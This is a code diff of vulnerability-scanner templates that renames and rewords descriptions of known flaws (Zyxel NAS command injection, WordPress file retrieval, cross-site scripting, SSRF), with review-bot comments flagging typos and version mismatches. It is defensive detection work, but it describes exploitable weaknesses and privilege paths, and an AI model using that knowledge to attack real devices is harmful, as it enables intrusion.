diff --git a/cves/2020/CVE-2020-9054.yaml b/cves/2020/CVE-2020-9054.yaml index 769a806db2..3b4c8d7c25 100644 --- a/cves/2020/CVE-2020-9054.yaml +++ b/cves/2020/CVE-2020-9054.yaml 
@@ -1,10 +1,10 @@ id: CVE-2020-9054 info: - name: ZyXEL NAS Firmware 5.21- Remote Code Execution + name: Zyxel NAS Firmware 5.21- Remote Code Execution author: dhiyaneshDk severity: critical - description: "Multiple ZyXEL network-attached storage (NAS) devices running firmware version 5.21 contain a pre-authentication command injection vulnerability, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable device. ZyXEL NAS devices achieve authentication by using the weblogin.cgi CGI executable. This program fails to properly sanitize the username parameter that is passed to it. If the username parameter contains certain characters, it can allow command injection with the privileges of the web server that runs on the ZyXEL device. Although the web server does not run as the root user, ZyXEL devices include a setuid utility that can be leveraged to run any command with root privileges. As such, it should be assumed that exploitation of this vulnerability can lead to remote code execution with root privileges. By sending a specially-crafted HTTP POST or GET request to a vulnerable ZyXEL device, a remote, unauthenticated attacker may be able to execute arbitrary code on the device. This may happen by directly connecting to a device if it is directly exposed to an attacker. However, there are ways to trigger such crafted requests even if an attacker does not have direct connectivity to a vulnerable devices. For example, simply visiting a website can result in the compromise of any ZyXEL device that is reachable from the client system. Affected products include: NAS326 before firmware V5.21(AAZF.7)C0 NAS520 before firmware V5.21(AASZ.3)C0 NAS540 before firmware V5.21(AATB.4)C0 NAS542 before firmware V5.21(ABAG.4)C0 ZyXEL has made firmware updates available for NAS326, NAS520, NAS540, and NAS542 devices. Affected models that are end-of-support: NSA210, NSA220, NSA220+, NSA221, NSA310, NSA310S, NSA320, NSA320S, NSA325 and NSA325v2." 
+ description: "Multiple Zyxel network-attached storage (NAS) devices running firmware version 5.21 contain a pre-authentication command injection vulnerability, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable device. Zyxel NAS devices achieve authentication by using the weblogin.cgi CGI executable. This program fails to properly sanitize the username parameter that is passed to it. If the username parameter contains certain characters, it can allow command injection with the privileges of the web server that runs on the Zyxel device. Although the web server does not run as the root user, Zyyxel devices include a setuid utility that can be leveraged to run any command with root privileges. As such, it should be assumed that exploitation of this vulnerability can lead to remote code execution with root privileges. By sending a specially-crafted HTTP POST or GET request to a vulnerable Zyyxel device, a remote, unauthenticated attacker may be able to execute arbitrary code on the device. This may happen by directly connecting to a device if it is directly exposed to an attacker. However, there are ways to trigger such crafted requests even if an attacker does not have direct connectivity to a vulnerable devices. For example, simply visiting a website can result in the compromise of any Zyyxel device that is reachable from the client system. Affected products include: NAS326 before firmware V5.21(AAZF.7)C0 NAS520 before firmware V5.21(AASZ.3)C0 NAS540 before firmware V5.21(AATB.4)C0 NAS542 before firmware V5.21(ABAG.4)C0 Zyyxel has made firmware updates available for NAS326, NAS520, NAS540, and NAS542 devices. Affected models that are end-of-support: NSA210, NSA220, NSA220+, NSA221, NSA310, NSA310S, NSA320, NSA320S, NSA325 and NSA325v2." reference: - https://krebsonsecurity.com/2020/02/zyxel-fixes-0day-in-network-storage-devices/ - https://www.zyxel.com/support/remote-code-execution-vulnerability-of-NAS-products.shtml 
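Review bot: The rewritten `description` for CVE-2020-9054 introduces the misspelling `Zyyxel` in four places (`Zyyxel devices include a setuid utility`, `a vulnerable Zyyxel device`, `any Zyyxel device`, `Zyyxel has made firmware updates`), which looks like a faulty search-and-replace of `ZyXEL`. A vendor-name search over template descriptions will miss those sentences, so each should read `Zyxel`. The phrase `to a vulnerable devices` is carried over unchanged from the old text and could be corrected to `to a vulnerable device` in the same pass.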
diff --git a/cves/2020/CVE-2020-9490.yaml b/cves/2020/CVE-2020-9490.yaml index f880e7d32d..aabdc20f55 100644 --- a/cves/2020/CVE-2020-9490.yaml +++ b/cves/2020/CVE-2020-9490.yaml @@ -1,11 +1,10 @@ id: CVE-2020-9490 info: - name: CVE-2020-9490 + name: Apache HTTP Server 2.4.20-2.4.43 - HTTP/2 Cache-Digest DoS author: philippedelteil severity: high - description: Apache HTTP Server versions 2.4.20 to 2.4.43. A specially crafted value for the 'Cache-Digest' header in a HTTP/2 request would result in a crash when the server actually tries to HTTP/2 PUSH a resource - afterwards. Configuring the HTTP/2 feature via "H2Push off" will mitigate this vulnerability for unpatched servers. + description: Apache HTTP Server versions 2.4.20 to 2.4.43. A specially crafted value for the 'Cache-Digest' header in a HTTP/2 request would result in a crash when the server actually tries to HTTP/2 PUSH a resource afterwards. Configuring the HTTP/2 feature via "H2Push off" will mitigate this vulnerability for unpatched servers. reference: - https://httpd.apache.org/security/vulnerabilities_24.html - https://bugs.chromium.org/p/project-zero/issues/detail?id=2030 diff --git a/cves/2021/CVE-2021-21816.yaml b/cves/2021/CVE-2021-21816.yaml index 7a8949b76f..2edea85ba4 100644 --- a/cves/2021/CVE-2021-21816.yaml +++ b/cves/2021/CVE-2021-21816.yaml 
@@ -1,10 +1,10 @@ id: CVE-2021-21816 info: - name: D-LINK DIR-3040 - Syslog Information Disclosure + name: D-Link DIR-3040 - Syslog Information Disclosure author: gy741 severity: medium - description: An information disclosure vulnerability exists in the Syslog functionality of D-LINK DIR-3040 1.13B03. A specially crafted network request can lead to the disclosure of sensitive information. An attacker + description: An information disclosure vulnerability exists in the Syslog functionality of D-Link DIR-3040 1.13B03. A specially crafted network request can lead to the disclosure of sensitive information. An attacker can send an HTTP request to trigger this vulnerability. reference: - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1281 diff --git a/cves/2021/CVE-2021-24997.yaml b/cves/2021/CVE-2021-24997.yaml index fa007b398c..a63de780be 100644 --- a/cves/2021/CVE-2021-24997.yaml +++ b/cves/2021/CVE-2021-24997.yaml @@ -1,10 +1,9 @@ id: CVE-2021-24997 info: - name: CVE-2021-24997 + name: Wordpress Guppy <=1.1 - User ID Disclosure author: Evan Rubinstein - description: Instances of the Guppy Wordpress extension up to 1.1 are vulnerable to an API disclosure vulnerability which allows remote unauthenticated attackrs to obtain all user IDs, and then use that information - to make API requests to either get messages sent between users, or send messages posing as one user to another. + description: Instances of the Guppy Wordpress extension up to 1.1 are vulnerable to an API disclosure vulnerability which allows remote unauthenticated attackrs to obtain all user IDs, and then use that information to make API requests to either get messages sent between users, or send messages posing as one user to another. reference: - https://www.exploit-db.com/exploits/50540 - https://patchstack.com/database/vulnerability/wp-guppy/wordpress-wp-guppy-plugin-1-2-sensitive-information-disclosure-vulnerability 
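Review bot: The replaced `description` line in CVE-2021-24997 still carries the typo `attackrs`; since the line is rewritten anyway it should read `remote unauthenticated attackers`. The visible `info` block also has no `severity` key between `author` and `description`, unlike the other templates in this patch. The hunk ends at the reference list, so it may be set further down, but if it is not, the template has no severity for scan filtering and report triage, and this would be the place to add one.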
@@ -32,4 +31,4 @@ requests: - '"guppyUsers":' - '"userId":' - '"type":' - condition: and \ No newline at end of file + condition: and diff --git a/cves/2021/CVE-2021-25118.yaml b/cves/2021/CVE-2021-25118.yaml index b9ea12f155..e9bd5f3d07 100644 --- a/cves/2021/CVE-2021-25118.yaml +++ b/cves/2021/CVE-2021-25118.yaml @@ -1,7 +1,7 @@ id: CVE-2021-25118 info: - name: Yoast SEO < 17.3 - Unauthenticated Full Path Disclosure + name: Yoast SEO < 17.3 - Path Disclosure author: DhiyaneshDK severity: medium description: The plugin discloses the full internal path of featured images in posts via the wp/v2/posts REST endpoints which could help an attacker identify other vulnerabilities or help during the exploitation of other identified vulnerabilities. diff --git a/cves/2021/CVE-2021-30151.yaml b/cves/2021/CVE-2021-30151.yaml index 01a8c5e671..8b67e5b577 100644 --- a/cves/2021/CVE-2021-30151.yaml +++ b/cves/2021/CVE-2021-30151.yaml @@ -1,7 +1,7 @@ id: CVE-2021-30151 info: - name: CVE-2021-30151 + name: Sidekiq 5.1.3 and 6.x-6.2.0 - Cross-Site Scripting author: DhiyaneshDk severity: medium description: Sidekiq through 5.1.3 and 6.x through 6.2.0 allows XSS via the queue name of the live-poll feature when Internet Explorer is used. @@ -33,4 +33,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/cves/2021/CVE-2021-39316.yaml b/cves/2021/CVE-2021-39316.yaml index cc8370a850..f2125025ea 100644 --- a/cves/2021/CVE-2021-39316.yaml +++ b/cves/2021/CVE-2021-39316.yaml 
@@ -1,11 +1,10 @@ id: CVE-2021-39316 info: - name: DZS Zoomsounds < 6.50 - Unauthenticated Arbitrary File Download + name: Wordpress DZS Zoomsounds <= 6.50 - Arbitrary File Retrieval author: daffainfo severity: high - description: The Zoomsounds plugin <= 6.45 for WordPress allows arbitrary files, including sensitive configuration files such as wp-config.php, to be downloaded via the `dzsap_download` action using directory traversal - in the `link` parameter. + description: The Zoomsounds plugin <= 6.45 for WordPress allows arbitrary files, including sensitive configuration files such as wp-config.php, to be downloaded via the `dzsap_download` action using a directory traversal in the `link` parameter. reference: - https://wpscan.com/vulnerability/d2d60cf7-e4d3-42b6-8dfe-7809f87547bd - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39316 @@ -30,4 +29,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/cves/2021/CVE-2021-41293.yaml b/cves/2021/CVE-2021-41293.yaml index b34135e53d..ab9790a110 100644 --- a/cves/2021/CVE-2021-41293.yaml +++ b/cves/2021/CVE-2021-41293.yaml @@ -1,7 +1,7 @@ id: CVE-2021-41293 info: - name: ECOA Building Automation System - Local File Disclosure + name: ECOA Building Automation System - Arbitrary File Retrieval author: 0x_Akoko severity: high description: The ECOA BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and disclose diff --git a/cves/2022/CVE-2022-0540.yaml b/cves/2022/CVE-2022-0540.yaml index 29a7bf8fa1..5e0d089bbb 100644 --- a/cves/2022/CVE-2022-0540.yaml +++ b/cves/2022/CVE-2022-0540.yaml @@ -1,7 +1,7 @@ id: CVE-2022-0540 info: - name: Atlassian Jira - Authentication bypass in Seraph + name: Atlassian Jira Seraph- Authentication Bypass author: DhiyaneshDK severity: critical description: | 
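Review bot: The new `name` for CVE-2021-39316 widens the affected range to `<= 6.50`, but the `description` edited in the same hunk states `<= 6.45`, and the old name said `< 6.50`. The name now claims more affected versions than the description supports, which can produce findings that are triaged as confirmed on releases the advisory text does not cover. Unless the referenced advisory confirms 6.50 as affected, I would align the name with the description: `name: WordPress DZS Zoomsounds <= 6.45 - Arbitrary File Retrieval`.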
diff --git a/cves/2022/CVE-2022-1119.yaml b/cves/2022/CVE-2022-1119.yaml index 9655352d6d..788e431fa4 100644 --- a/cves/2022/CVE-2022-1119.yaml +++ b/cves/2022/CVE-2022-1119.yaml @@ -1,11 +1,11 @@ id: CVE-2022-1119 info: - name: WordPress Simple File List < 3.2.8 - Unauthenticated Arbitrary File Download + name: WordPress Simple File List < 3.2.8 - Arbitrary File Retrieval author: random-robbie severity: high description: | - The plugin is vulnerable to Arbitrary File Download via the eeFile parameter found in the ~/includes/ee-downloader.php file due to missing controls which makes it possible unauthenticated attackers to supply a path to a file that will subsequently be downloaded + The Wordpress plugin is vulnerable to arbitrary file retrieval via the eeFile parameter found in the ~/includes/ee-downloader.php file due to missing controls which make it possible for unauthenticated attackers retrieve arbitrary files. reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-1119 - https://wpscan.com/vulnerability/5551038f-64fb-44d8-bea0-d2f00f04877e diff --git a/cves/2022/CVE-2022-1221.yaml b/cves/2022/CVE-2022-1221.yaml index 1ca0d40b7e..65c2dc6a32 100644 --- a/cves/2022/CVE-2022-1221.yaml +++ b/cves/2022/CVE-2022-1221.yaml @@ -5,10 +5,12 @@ info: author: veshraj severity: medium description: | - The plugin does not sanitise and escape some parameters before outputting them back in attributes, leading to a Reflected Cross-Site Scripting. + The Gwyn's Imagemap Selector Wordpresss plugin does not sanitize the id and class parameters before returning them back in attributes, leading to a Reflected Cross-Site Scripting. reference: - https://wpscan.com/vulnerability/641be9f6-2f74-4386-b16e-4b9488f0d2a9 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1221 + classification: + cve-id: CVE-2022-1221 metadata: verified: true tags: xss,wordpress,wp-plugin,wp,cve,cve2022 
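Review bot: The new `description` in CVE-2022-1221 misspells the platform as `Wordpresss`, and the new one in CVE-2022-1119 drops a word in `for unauthenticated attackers retrieve arbitrary files`. Suggested wording: `The Gwyn's Imagemap Selector WordPress plugin does not sanitize the id and class parameters ...` and `... which make it possible for unauthenticated attackers to retrieve arbitrary files.` The `classification` block added to CVE-2022-1221 holds only `cve-id`; for a reflected cross-site scripting template a `cwe-id: CWE-79` line would make it usable for weakness-based filtering.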
diff --git a/exposed-panels/gogs-login.yaml b/exposed-panels/gogs-login.yaml index 8a378d1088..7a95d2bd06 100644 --- a/exposed-panels/gogs-login.yaml +++ b/exposed-panels/gogs-login.yaml @@ -1,7 +1,7 @@ id: gogs-login info: - name: Sign In - Gogs + name: Gogs (Go Git Service) - Sign In Page author: dhiyaneshDK severity: info metadata: diff --git a/exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml b/exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml index 59bf6a7764..7022469938 100644 --- a/exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml +++ b/exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml @@ -1,7 +1,7 @@ id: zyxel-vmg1312b10d-login info: - name: ZYXEL VMG1312-B10D Login Detect + name: Zyxel VMG1312-B10D - Login Detection author: princechaddha severity: info metadata: diff --git a/exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml b/exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml index 95c475ef83..b11a2c0c5f 100644 --- a/exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml +++ b/exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml @@ -1,7 +1,7 @@ id: zyxel-vsg1432b101-login info: - name: ZYXEL VSG1432-B101 Login Detect + name: Zyxel VSG1432-B101 - Login Detection author: princechaddha severity: info metadata: diff --git a/exposures/files/gogs-install-exposure.yaml b/exposures/files/gogs-install-exposure.yaml index a7369b2cb4..c3c6b915df 100644 --- a/exposures/files/gogs-install-exposure.yaml +++ b/exposures/files/gogs-install-exposure.yaml @@ -1,7 +1,7 @@ id: gogs-install-exposure info: - name: Gogs install exposure + name: Gogs (Go Git Service) - Install Exposure author: dhiyaneshDk severity: high tags: gogs,exposure diff --git a/headless/window-name-domxss.yaml b/headless/window-name-domxss.yaml index c8fcff19b9..7c202f7d8b 100644 --- a/headless/window-name-domxss.yaml +++ b/headless/window-name-domxss.yaml 
@@ -1,7 +1,7 @@ id: window-name-domxss info: - name: window.name DOM XSS + name: window.name - DOM Cross-Site Scripting author: pdteam severity: medium reference: diff --git a/misconfiguration/aem/aem-setpreferences-xss.yaml b/misconfiguration/aem/aem-setpreferences-xss.yaml index d58bb560ba..87462f5774 100644 --- a/misconfiguration/aem/aem-setpreferences-xss.yaml +++ b/misconfiguration/aem/aem-setpreferences-xss.yaml @@ -1,7 +1,7 @@ id: aem-setpreferences-xss info: - name: AEM setPreferences XSS + name: AEM setPreferences - Cross-Site Scripting author: zinminphy0,dhiyaneshDK severity: medium reference: @@ -27,4 +27,4 @@ requests: - type: status status: - - 400 \ No newline at end of file + - 400 diff --git a/misconfiguration/akamai-arl-xss.yaml b/misconfiguration/akamai-arl-xss.yaml index f447dbdb60..6a9c5fd334 100644 --- a/misconfiguration/akamai-arl-xss.yaml +++ b/misconfiguration/akamai-arl-xss.yaml @@ -1,7 +1,7 @@ id: akamai-arl-xss info: - name: Open Akamai ARL XSS + name: Open Akamai ARL - Cross-Site Scripting author: pdteam severity: medium reference: @@ -28,4 +28,4 @@ requests: - type: word part: header words: - - 'text/html' \ No newline at end of file + - 'text/html' diff --git a/misconfiguration/ampps-dirlisting.yaml b/misconfiguration/ampps-dirlisting.yaml index 995d6fb8b5..ad455130e5 100644 --- a/misconfiguration/ampps-dirlisting.yaml +++ b/misconfiguration/ampps-dirlisting.yaml @@ -1,7 +1,7 @@ id: ampps-dirlisting info: - name: AMPPS by Softaculous - Directory Listing Enabled + name: AMPPS by Softaculous - Directory Listing author: deFr0ggy severity: info tags: panel,ampps,softaculous,misconfig diff --git a/misconfiguration/d-link-arbitary-fileread.yaml b/misconfiguration/d-link-arbitary-fileread.yaml index 1528be0049..453ed0fb23 100644 --- a/misconfiguration/d-link-arbitary-fileread.yaml +++ b/misconfiguration/d-link-arbitary-fileread.yaml 
@@ -1,7 +1,7 @@ id: dlink-file-read info: - name: D-Link Arbitrary File Read + name: D-Link - Arbitrary File Retrieval author: dhiyaneshDK severity: high reference: diff --git a/vulnerabilities/moodle/moodle-filter-jmol-xss.yaml b/vulnerabilities/moodle/moodle-filter-jmol-xss.yaml index bf7d0f70de..4c3f3c6236 100644 --- a/vulnerabilities/moodle/moodle-filter-jmol-xss.yaml +++ b/vulnerabilities/moodle/moodle-filter-jmol-xss.yaml @@ -1,7 +1,7 @@ id: moodle-filter-jmol-xss info: - name: Moodle filter_jmol - XSS + name: Moodle filter_jmol - Cross-Site Scripting author: madrobot severity: medium description: Cross-site scripting on Moodle. @@ -28,4 +28,4 @@ requests: - type: word part: header words: - - "text/html" \ No newline at end of file + - "text/html" diff --git a/vulnerabilities/moodle/moodle-xss.yaml b/vulnerabilities/moodle/moodle-xss.yaml index 3f3938d9db..5dcfe36be5 100644 --- a/vulnerabilities/moodle/moodle-xss.yaml +++ b/vulnerabilities/moodle/moodle-xss.yaml @@ -1,7 +1,7 @@ id: moodle-xss info: - name: Moodle redirect_uri Reflected XSS + name: Moodle redirect_uri - Cross-Site Scripting author: hackergautam severity: medium description: XSS in moodle via redirect_uri parameter diff --git a/vulnerabilities/netsweeper/netsweeper-rxss.yaml b/vulnerabilities/netsweeper/netsweeper-rxss.yaml index 2d493bd7f4..18892a3101 100644 --- a/vulnerabilities/netsweeper/netsweeper-rxss.yaml +++ b/vulnerabilities/netsweeper/netsweeper-rxss.yaml @@ -1,7 +1,7 @@ id: netsweeper-rxss info: - name: Netsweeper 4.0.9 - Cross Site Scripting Injection + name: Netsweeper 4.0.9 - Cross-Site Scripting author: daffainfo severity: medium reference: diff --git a/vulnerabilities/oracle/oracle-ebs-xss.yaml b/vulnerabilities/oracle/oracle-ebs-xss.yaml index c5252391cf..23bd3eea02 100644 --- a/vulnerabilities/oracle/oracle-ebs-xss.yaml +++ b/vulnerabilities/oracle/oracle-ebs-xss.yaml 
@@ -1,7 +1,7 @@ id: oracle-ebs-xss info: - name: Oracle EBS XSS + name: Oracle EBS - Cross-Site Scripting author: dhiyaneshDk severity: medium reference: diff --git a/vulnerabilities/other/bems-api-lfi.yaml b/vulnerabilities/other/bems-api-lfi.yaml index a672809b50..fa2efedbb9 100644 --- a/vulnerabilities/other/bems-api-lfi.yaml +++ b/vulnerabilities/other/bems-api-lfi.yaml @@ -1,10 +1,10 @@ id: bems-api-lfi info: - name: Longjing Technology BEMS API 1.21 - Remote Arbitrary File Download + name: Longjing Technology BEMS API 1.21 - Arbitrary File Retrieval author: gy741 severity: high - description: The application suffers from an unauthenticated arbitrary file download vulnerability. Input passed through the fileName parameter through downloads endpoint is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files through directory traversal attacks. + description: The application suffers from an unauthenticated arbitrary file retrieval vulnerability. Input passed through the fileName parameter through the downloads API endpoint is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files through directory traversal attacks. reference: - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5657.php tags: lfi diff --git a/vulnerabilities/other/ecsimagingpacs-rce.yaml b/vulnerabilities/other/ecsimagingpacs-rce.yaml index b102fbcffc..115478ee95 100644 --- a/vulnerabilities/other/ecsimagingpacs-rce.yaml +++ b/vulnerabilities/other/ecsimagingpacs-rce.yaml 
@@ -1,14 +1,16 @@ id: ecsimagingpacs-rce info: - name: ECSIMAGING PACS 6.21.5 - Remote code execution + name: ECSIMAGING PACS <= 6.21.5 - Command Execution and Local File Inclusion author: ritikchaddha severity: critical - description: ECSIMAGING PACS Application in 6.21.5 and bellow suffers from a OS Injection vulnerability. The parameter `file` on the webpage /showfile.php can be exploited with simple OS injection to gain root access. www-data user has sudo NOPASSWD access + description: ECSIMAGING PACS Application 6.21.5 and below suffer from a command injection vulnerability and a local file include vulnerability. The 'file' parameter on the page /showfile.php can be exploited to perform command execution or local file inclusion. Often on ECSIMAGING PACS, the www-data user has sudo NOPASSWD access. reference: https://www.exploit-db.com/exploits/49388 metadata: verified: false tags: ecsimagingpacs,rce + classification: + cwe-id: CWE-78 requests: - method: GET @@ -24,3 +26,5 @@ requests: - type: status status: - 200 + +# Enhanced by cs 05/12/2022 diff --git a/vulnerabilities/other/eyelock-nano-lfd.yaml b/vulnerabilities/other/eyelock-nano-lfd.yaml index 7fce23a1a5..483437d4b9 100644 --- a/vulnerabilities/other/eyelock-nano-lfd.yaml +++ b/vulnerabilities/other/eyelock-nano-lfd.yaml 
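Review bot: The added `classification` block records only `cwe-id: CWE-78`, and `tags` stays `ecsimagingpacs,rce`, although the rewritten name and description now say the template covers both command execution and local file inclusion. Anyone filtering results by tag or CWE will miss the file-inclusion half; I would use `tags: ecsimagingpacs,rce,lfi`, or keep the name to whatever the request actually tests, which is not visible in this hunk. `reference` is also a bare scalar here while the other templates in this series use a list, so `reference:` followed by `- https://www.exploit-db.com/exploits/49388` would be consistent.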
@@ -1,10 +1,10 @@ id: eyelock-nano-lfd info: - name: EyeLock nano NXT 3.5 - Local File Disclosure + name: EyeLock nano NXT 3.5 - Arbitrary File Retrieval author: geeknik severity: high - description: EyeLock nano NXT suffers from a file disclosure vulnerability when input passed through the 'path' parameter to 'logdownload.php' script is not properly verified before being used to read files. This + description: EyeLock nano NXT suffers from a file retrieval vulnerability when input passed through the 'path' parameter to 'logdownload.php' script is not properly verified before being used to read files. This can be exploited to disclose contents of files from local resources. reference: - https://www.zeroscience.mk/codes/eyelock_lfd.txt diff --git a/vulnerabilities/other/java-melody-xss.yaml b/vulnerabilities/other/java-melody-xss.yaml index 3899625c59..efa41edf75 100644 --- a/vulnerabilities/other/java-melody-xss.yaml +++ b/vulnerabilities/other/java-melody-xss.yaml @@ -1,7 +1,7 @@ id: java-melody-xss info: - name: JavaMelody Monitoring XSS + name: JavaMelody Monitoring - Cross-Site Scripting author: kailashbohara severity: medium description: Reflected cross site scripting (XSS) in JavaMelody monitoring. diff --git a/vulnerabilities/other/kafdrop-xss.yaml b/vulnerabilities/other/kafdrop-xss.yaml index d191b88f28..32f69bbf74 100644 --- a/vulnerabilities/other/kafdrop-xss.yaml +++ b/vulnerabilities/other/kafdrop-xss.yaml @@ -1,10 +1,10 @@ id: kafdrop-xss info: - name: KafDrop XSS + name: KafDrop - Cross-Site Scripting author: dhiyaneshDk severity: medium - description: A vulnerability in KafDrop allows remote unauthenticated attackers to inject arbitrary HTML and/or Javascript into the response returned by the server. + description: A vulnerability in KafDrop allows remote unauthenticated attackers to inject arbitrary HTML and/or JavaScript into the response returned by the server. reference: - https://github.com/HomeAdvisor/Kafdrop/issues/12 tags: kafdrop,xss 
diff --git a/vulnerabilities/other/kyocera-m2035dn-lfi.yaml b/vulnerabilities/other/kyocera-m2035dn-lfi.yaml index f0587dca70..35651ada5b 100644 --- a/vulnerabilities/other/kyocera-m2035dn-lfi.yaml +++ b/vulnerabilities/other/kyocera-m2035dn-lfi.yaml @@ -1,10 +1,10 @@ id: kyocera-m2035dn-lfi info: - name: Kyocera Command Center RX ECOSYS M2035dn - Directory Traversal File Disclosure (Unauthenticated) + name: Kyocera Command Center RX ECOSYS M2035dn - Arbitrary File Retrieval author: 0x_Akoko severity: high - description: Kyocera Command Center RX ECOSYS M2035dn - Directory Traversal File Disclosure (Unauthenticated) + description: Kyocera Command Center RX ECOSYS M2035dn - Unauthenticated arbitrary file retrieval. reference: - https://www.exploit-db.com/exploits/50738 - https://www.kyoceradocumentsolutions.com/asia/en/products/business-application/command-center-rx.html diff --git a/vulnerabilities/other/microstrategy-ssrf.yaml b/vulnerabilities/other/microstrategy-ssrf.yaml index 20b4e2ed73..df76c1a881 100644 --- a/vulnerabilities/other/microstrategy-ssrf.yaml +++ b/vulnerabilities/other/microstrategy-ssrf.yaml @@ -1,10 +1,10 @@ id: microstrategy-ssrf info: - name: MicroStrategy tinyurl - BSSRF + name: MicroStrategy tinyurl - Server-Side Request Forgery (Blind) author: organiccrap severity: high - description: Blind server-side request forgery vulnerability on MicroStrategy URL shortener. + description: Blind server-side (SSRF) request forgery vulnerability on MicroStrategy URL shortener. reference: - https://medium.com/@win3zz/how-i-made-31500-by-submitting-a-bug-to-facebook-d31bb046e204 tags: microstrategy,ssrf diff --git a/vulnerabilities/other/nginx-module-vts-xss.yaml b/vulnerabilities/other/nginx-module-vts-xss.yaml index 9c48e332f3..f0ca677575 100644 --- a/vulnerabilities/other/nginx-module-vts-xss.yaml +++ b/vulnerabilities/other/nginx-module-vts-xss.yaml 
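Review bot: In the microstrategy-ssrf hunk the new description puts the acronym in the middle of the term it abbreviates: `Blind server-side (SSRF) request forgery vulnerability`. It should read `description: Blind server-side request forgery (SSRF) vulnerability on MicroStrategy URL shortener.`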
@@ -1,7 +1,7 @@ id: nginx-module-vts-xss info: - name: Nginx virtual host traffic status module XSS + name: Nginx Virtual Host Traffic Status Module - Cross-Site Scripting author: madrobot severity: medium tags: nginx,xss,status diff --git a/vulnerabilities/other/nuuo-file-inclusion.yaml b/vulnerabilities/other/nuuo-file-inclusion.yaml index 9836361754..f577991d4f 100644 --- a/vulnerabilities/other/nuuo-file-inclusion.yaml +++ b/vulnerabilities/other/nuuo-file-inclusion.yaml @@ -1,7 +1,7 @@ id: nuuo-file-inclusion info: - name: NUUO NVRmini 2 3.0.8 Local File Disclosure + name: NUUO NVRmini 2 v3.0.8 - Atrbitary File Retrieval author: princechaddha severity: high reference: diff --git a/vulnerabilities/other/odoo-cms-redirect.yaml b/vulnerabilities/other/odoo-cms-redirect.yaml index cc3be56efb..3fecc9364a 100644 --- a/vulnerabilities/other/odoo-cms-redirect.yaml +++ b/vulnerabilities/other/odoo-cms-redirect.yaml @@ -1,12 +1,13 @@ id: odoo-cms-redirect info: - name: Odoo CMS - Open redirection all Version + name: Odoo CMS - Open Redirect author: 0x_Akoko severity: low - description: Odoo CMS - Open redirection all Version. + description: Odoo CMS - Open redirection in all versions due to Odoo's policy. reference: - https://cxsecurity.com/issue/WLB-2021020143 + - https://www.odoo.com/page/security-nonvuln-redirectors tags: odoo,redirect requests: diff --git a/vulnerabilities/other/oliver-library-lfi.yaml b/vulnerabilities/other/oliver-library-lfi.yaml index 847d04b8a5..4d3eaf3db1 100644 --- a/vulnerabilities/other/oliver-library-lfi.yaml +++ b/vulnerabilities/other/oliver-library-lfi.yaml 
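Review bot: The new name in the nuuo-file-inclusion hunk is misspelled: `Atrbitary File Retrieval`. The name is what appears in scan output and what people search reports for, so it should be `name: NUUO NVRmini 2 v3.0.8 - Arbitrary File Retrieval`.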
@@ -1,10 +1,10 @@ id: oliver-library-lfi info: - name: Oliver Library Server v5 - Arbitrary File Download + name: Oliver Library Server v5 <8.00.008.053 - Arbitrary File Retrieval author: gy741 severity: high - description: An arbitrary file download vulnerability in Oliver v5 Library Server Versions < 8.00.008.053 via the FileServlet function allows for arbitrary file download by an attacker using unsanitized user supplied input. + description: An arbitrary file retrieval vulnerability in Oliver v5 Library Server Versions < 8.00.008.053 via the FileServlet function allows for arbitrary file retrieval by an attacker using unsanitized user supplied input. reference: - https://www.exploit-db.com/exploits/50599 - https://www.softlinkint.com/product/oliver/ diff --git a/vulnerabilities/other/pbootcms-database-file-download.yaml b/vulnerabilities/other/pbootcms-database-file-download.yaml index b65860d801..9781cd9421 100644 --- a/vulnerabilities/other/pbootcms-database-file-download.yaml +++ b/vulnerabilities/other/pbootcms-database-file-download.yaml @@ -1,7 +1,7 @@ id: pbootcms-database-file-download info: - name: PbootCMS v2.0.7 DB File Download + name: PbootCMS v2.0.7 - pbootcms.db File Download author: ritikchaddha severity: high reference: diff --git a/vulnerabilities/other/pmb-directory-traversal.yaml b/vulnerabilities/other/pmb-directory-traversal.yaml index 60ca1be4ab..69934ef8a1 100644 --- a/vulnerabilities/other/pmb-directory-traversal.yaml +++ b/vulnerabilities/other/pmb-directory-traversal.yaml 
@@ -1,10 +1,10 @@ id: pmb-directory-traversal info: - name: PMB 5.6 Directory Traversal + name: PMB 5.6 - Arbitrary File Retrieval author: geeknik severity: medium - description: The PMB Gif Image is not sanitizing the content of the 'chemin' parameter, this can in turn be used to a Local File Disclosure. + description: The PMB Gif Image is not sanitizing the content of the 'chemin' parameter, wchi can be used for local file retrieval. reference: - https://packetstormsecurity.com/files/160072/PMB-5.6-Local-File-Disclosure-Directory-Traversal.html tags: lfi diff --git a/vulnerabilities/other/pmb-local-file-disclosure.yaml b/vulnerabilities/other/pmb-local-file-disclosure.yaml index 64775b42b1..b67c0f99da 100644 --- a/vulnerabilities/other/pmb-local-file-disclosure.yaml +++ b/vulnerabilities/other/pmb-local-file-disclosure.yaml @@ -1,7 +1,7 @@ id: pmb-local-file-disclosure info: - name: PMB 5.6 - 'chemin' Local File Disclosure + name: PMB 5.6 - getgif.php Arbitrary File Retrieval author: dhiyaneshDk severity: high reference: diff --git a/vulnerabilities/other/wems-manager-xss.yaml b/vulnerabilities/other/wems-manager-xss.yaml index d974e51e47..951a568d3d 100644 --- a/vulnerabilities/other/wems-manager-xss.yaml +++ b/vulnerabilities/other/wems-manager-xss.yaml @@ -1,7 +1,7 @@ id: wems-manager-xss info: - name: WEMS Enterprise Manager XSS + name: WEMS Enterprise Manager - Cross-Site Scripting author: 